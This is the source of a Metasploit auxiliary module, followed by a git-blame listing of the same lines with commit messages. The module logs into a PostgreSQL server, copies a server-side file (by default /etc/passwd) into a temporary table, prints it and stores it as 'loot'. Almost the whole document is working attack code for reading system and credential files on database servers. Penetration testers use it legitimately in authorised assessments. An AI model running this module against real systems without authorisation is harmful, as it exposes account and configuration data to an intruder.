modules/auxiliary/admin/postgres/postgres_readfile.rb

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::Postgres
  include Msf::Auxiliary::Report
  include Msf::OptionalSession::PostgreSQL

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'PostgreSQL Server Generic Query',
        'Description' => %q{
          This module imports a file local on the PostgreSQL Server into a
          temporary table, reads it, and then drops the temporary table.
          It requires PostgreSQL credentials with table CREATE privileges
          as well as read privileges to the target file.
        },
        'Author' => [ 'todb' ],
        'License' => MSF_LICENSE,
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'SideEffects' => [IOC_IN_LOGS, CONFIG_CHANGES],
          'Reliability' => []
        }
      )
    )

    register_options(
      [
        OptString.new('RFILE', [true, 'The remote file', '/etc/passwd'])
      ]
    )

    deregister_options('SQL', 'RETURN_ROWSET')
  end

  def rhost
    datastore['RHOST']
  end

  def rport
    datastore['RPORT']
  end

  def run
    self.postgres_conn = session.client if session
    ret = postgres_read_textfile(datastore['RFILE'])
    case ret.keys[0]
    when :conn_error
      print_error "#{rhost}:#{rport} Postgres - Authentication failure, could not connect."
    when :sql_error
      case ret[:sql_error]
      when /^C58P01/
        print_error "#{postgres_conn.peerhost}:#{postgres_conn.peerport} Postgres - No such file or directory."
        vprint_status "#{postgres_conn.peerhost}:#{postgres_conn.peerport} Postgres - #{ret[:sql_error]}"
      when /^C42501/
        print_error "#{postgres_conn.peerhost}:#{postgres_conn.peerport} Postgres - Insufficient file permissions."
        vprint_status "#{postgres_conn.peerhost}:#{postgres_conn.peerport} Postgres - #{ret[:sql_error]}"
      else
        print_error "#{postgres_conn.peerhost}:#{postgres_conn.peerport} Postgres - #{ret[:sql_error]}"
      end
    when :complete
      loot = ''
      ret[:complete].rows.each do |row|
        print_line(row.first)
        loot << row.first
      end
      # No idea what the actual ctype will be, text/plain is just a guess
      path = store_loot('postgres.file', 'text/plain', postgres_conn.peerhost, loot, datastore['RFILE'])
      print_good("#{postgres_conn.peerhost}:#{postgres_conn.peerport} Postgres - #{datastore['RFILE']} saved in #{path}")
      vprint_good "#{postgres_conn.peerhost}:#{postgres_conn.peerport} Postgres - Command complete."
    end
    postgres_logout if postgres_conn && session.blank?
  end
end
See #816 . This came up while learning how to perform various postgre tasks via Metasploit. 2010-02-08 22:34:09 +00:00			`##`
use https for metaploit.com links 2017-07-24 06:26:21 -07:00			`# This module requires Metasploit: https://metasploit.com/download`
Redo the boilerplate / splat 2013-10-15 13:50:46 -05:00			`# Current source: https://github.com/rapid7/metasploit-framework`
See #816 . This came up while learning how to perform various postgre tasks via Metasploit. 2010-02-08 22:34:09 +00:00			`##`

use MetasploitModule as a class name 2016-03-08 14:02:44 +01:00			`class MetasploitModule < Msf::Auxiliary`
See #816 . This came up while learning how to perform various postgre tasks via Metasploit. 2010-02-08 22:34:09 +00:00			`include Msf::Exploit::Remote::Postgres`
Save the pilfered file as loot 2012-05-23 18:07:13 -06:00			`include Msf::Auxiliary::Report`
Use individual session mixins 2024-02-12 11:52:48 +00:00			`include Msf::OptionalSession::PostgreSQL`
big module whitespace/formatting cleanup pass 2010-04-30 08:40:19 +00:00
See #816 . This came up while learning how to perform various postgre tasks via Metasploit. 2010-02-08 22:34:09 +00:00			`def initialize(info = {})`
modules/auxiliary/admin: Resolve RuboCop violations 2025-05-21 08:32:40 +10:00			`super(`
			`update_info(`
			`info,`
			`'Name' => 'PostgreSQL Server Generic Query',`
			`'Description' => %q{`
See #816 . This came up while learning how to perform various postgre tasks via Metasploit. 2010-02-08 22:34:09 +00:00			`This module imports a file local on the PostgreSQL Server into a`
			`temporary table, reads it, and then drops the temporary table.`
			`It requires PostgreSQL credentials with table CREATE privileges`
			`as well as read privileges to the target file.`
modules/auxiliary/admin: Resolve RuboCop violations 2025-05-21 08:32:40 +10:00			`},`
			`'Author' => [ 'todb' ],`
			`'License' => MSF_LICENSE,`
			`'Notes' => {`
			`'Stability' => [CRASH_SAFE],`
			`'SideEffects' => [IOC_IN_LOGS, CONFIG_CHANGES],`
			`'Reliability' => []`
			`}`
			`)`
			`)`
See #816 . This came up while learning how to perform various postgre tasks via Metasploit. 2010-02-08 22:34:09 +00:00
			`register_options(`
			`[`
modules/auxiliary/admin: Resolve RuboCop violations 2025-05-21 08:32:40 +10:00			`OptString.new('RFILE', [true, 'The remote file', '/etc/passwd'])`
Use PostgreSQL session type for modules 2024-01-24 13:47:22 +00:00			`]`
			`)`
See #816 . This came up while learning how to perform various postgre tasks via Metasploit. 2010-02-08 22:34:09 +00:00
modules/auxiliary/admin: Resolve RuboCop violations 2025-05-21 08:32:40 +10:00			`deregister_options('SQL', 'RETURN_ROWSET')`
See #816 . This came up while learning how to perform various postgre tasks via Metasploit. 2010-02-08 22:34:09 +00:00			`end`

			`def rhost`
			`datastore['RHOST']`
			`end`

			`def rport`
			`datastore['RPORT']`
			`end`
big module whitespace/formatting cleanup pass 2010-04-30 08:40:19 +00:00
See #816 . This came up while learning how to perform various postgre tasks via Metasploit. 2010-02-08 22:34:09 +00:00			`def run`
Use PostgreSQL session type for modules 2024-01-24 13:47:22 +00:00			`self.postgres_conn = session.client if session`
See #816 . This came up while learning how to perform various postgre tasks via Metasploit. 2010-02-08 22:34:09 +00:00			`ret = postgres_read_textfile(datastore['RFILE'])`
			`case ret.keys[0]`
			`when :conn_error`
			`print_error "#{rhost}:#{rport} Postgres - Authentication failure, could not connect."`
			`when :sql_error`
			`case ret[:sql_error]`
			`when /^C58P01/`
Align SQL sessions peerhost and peerport 2024-02-19 10:57:53 +00:00			`print_error "#{postgres_conn.peerhost}:#{postgres_conn.peerport} Postgres - No such file or directory."`
			`vprint_status "#{postgres_conn.peerhost}:#{postgres_conn.peerport} Postgres - #{ret[:sql_error]}"`
See #816 . This came up while learning how to perform various postgre tasks via Metasploit. 2010-02-08 22:34:09 +00:00			`when /^C42501/`
Align SQL sessions peerhost and peerport 2024-02-19 10:57:53 +00:00			`print_error "#{postgres_conn.peerhost}:#{postgres_conn.peerport} Postgres - Insufficient file permissions."`
			`vprint_status "#{postgres_conn.peerhost}:#{postgres_conn.peerport} Postgres - #{ret[:sql_error]}"`
See #816 . This came up while learning how to perform various postgre tasks via Metasploit. 2010-02-08 22:34:09 +00:00			`else`
Align SQL sessions peerhost and peerport 2024-02-19 10:57:53 +00:00			`print_error "#{postgres_conn.peerhost}:#{postgres_conn.peerport} Postgres - #{ret[:sql_error]}"`
See #816 . This came up while learning how to perform various postgre tasks via Metasploit. 2010-02-08 22:34:09 +00:00			`end`
			`when :complete`
Save the pilfered file as loot 2012-05-23 18:07:13 -06:00			`loot = ''`
modules/auxiliary/admin: Resolve RuboCop violations 2025-05-21 08:32:40 +10:00			`ret[:complete].rows.each do \|row\|`
Save the pilfered file as loot 2012-05-23 18:07:13 -06:00			`print_line(row.first)`
			`loot << row.first`
modules/auxiliary/admin: Resolve RuboCop violations 2025-05-21 08:32:40 +10:00			`end`
Save the pilfered file as loot 2012-05-23 18:07:13 -06:00			`# No idea what the actual ctype will be, text/plain is just a guess`
Align SQL sessions peerhost and peerport 2024-02-19 10:57:53 +00:00			`path = store_loot('postgres.file', 'text/plain', postgres_conn.peerhost, loot, datastore['RFILE'])`
			`print_good("#{postgres_conn.peerhost}:#{postgres_conn.peerport} Postgres - #{datastore['RFILE']} saved in #{path}")`
modules/auxiliary/admin: Resolve RuboCop violations 2025-05-21 08:32:40 +10:00			`vprint_good "#{postgres_conn.peerhost}:#{postgres_conn.peerport} Postgres - Command complete."`
See #816 . This came up while learning how to perform various postgre tasks via Metasploit. 2010-02-08 22:34:09 +00:00			`end`
modules/auxiliary/admin: Resolve RuboCop violations 2025-05-21 08:32:40 +10:00			`postgres_logout if postgres_conn && session.blank?`
See #816 . This came up while learning how to perform various postgre tasks via Metasploit. 2010-02-08 22:34:09 +00:00			`end`
			`end`